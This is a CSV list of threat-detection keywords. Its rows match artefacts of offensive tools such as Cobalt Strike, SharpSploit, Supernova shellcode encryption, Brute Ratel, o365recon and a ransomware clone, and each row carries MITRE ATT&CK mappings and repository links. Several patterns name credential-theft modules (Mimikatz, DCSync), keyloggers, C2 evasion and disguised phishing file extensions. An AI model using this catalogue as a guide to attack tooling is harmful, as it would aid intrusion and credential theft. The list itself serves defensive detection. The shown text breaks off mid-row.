"*.asreproast.txt*",".{0,1000}\.asreproast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.athena_utils *",".{0,1000}\.athena_utils\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*.AzureAD.Application_Owners.csv*",".{0,1000}\.AzureAD\.Application_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.AzureAD.DeviceList_Owners.csv*",".{0,1000}\.AzureAD\.DeviceList_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*.beta.123456.*",".{0,1000}\.beta\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.bin -enc rc4 -lang c -k 3 -o *.bin*",".{0,1000}\.bin\s\-enc\src4\s\-lang\sc\s\-k\s3\s\-o\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rc4 -lang csharp -k 9*",".{0,1000}\.bin\s\-enc\src4\s\-lang\scsharp\s\-k\s9.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rot -lang csharp -k 2 -d*",".{0,1000}\.bin\s\-enc\srot\s\-lang\scsharp\s\-k\s2\s\-d.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc rot -lang rust -k 7*",".{0,1000}\.bin\s\-enc\srot\s\-lang\srust\s\-k\s7.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc xor -lang csharp -k 2 -v nickvourd*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\scsharp\s\-k\s2\s\-v\snickvourd.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.bin -enc xor -lang nim -k 4*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\snim\s\-k\s4.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.blog.123456.*",".{0,1000}\.blog\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.BruteRatel*",".{0,1000}\.BruteRatel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.cobaltstrike*",".{0,1000}\.cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*.com/dcsync/*",".{0,1000}\.com\/dcsync\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*.com/SecureAuthCorp*",".{0,1000}\.com\/SecureAuthCorp.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.com/SpiderLabs*",".{0,1000}\.com\/SpiderLabs.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools adn documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.Credentials.Mimikatz.*",".{0,1000}\.Credentials\.Mimikatz\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Credentials.Tokens.BypassUAC*",".{0,1000}\.Credentials\.Tokens\.BypassUAC.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.DCSync(System.String*",".{0,1000}\.DCSync\(System\.String.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.dev.123456.*",".{0,1000}\.dev\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.dns2tcpdrc*",".{0,1000}\.dns2tcpdrc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*.doc.bat*",".{0,1000}\.doc\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.dll*",".{0,1000}\.doc\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.exe*",".{0,1000}\.doc\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.htm*",".{0,1000}\.doc\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.iso*",".{0,1000}\.doc\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.jar*",".{0,1000}\.doc\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.js*",".{0,1000}\.doc\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.sfx*",".{0,1000}\.doc\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.vbs*",".{0,1000}\.doc\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.bat*",".{0,1000}\.docx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.dll*",".{0,1000}\.docx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.exe*",".{0,1000}\.docx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.htm*",".{0,1000}\.docx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.iso*",".{0,1000}\.docx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.jar*",".{0,1000}\.docx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.jasmin*",".{0,1000}\.docx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.docx.js*",".{0,1000}\.docx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.sfx*",".{0,1000}\.docx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.vbs*",".{0,1000}\.docx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.Enumeration.Domain.Credential*",".{0,1000}\.Enumeration\.Domain\.Credential.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Domain.SPNTicket*",".{0,1000}\.Enumeration\.Domain\.SPNTicket.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Keylogger*",".{0,1000}\.Enumeration\.Keylogger.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Keylogger.*",".{0,1000}\.Enumeration\.Keylogger\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Network.PortScanResult*",".{0,1000}\.Enumeration\.Network\.PortScanResult.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Registry.GetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.GetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Registry.SetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.SetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.events.123456.*",".{0,1000}\.events\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 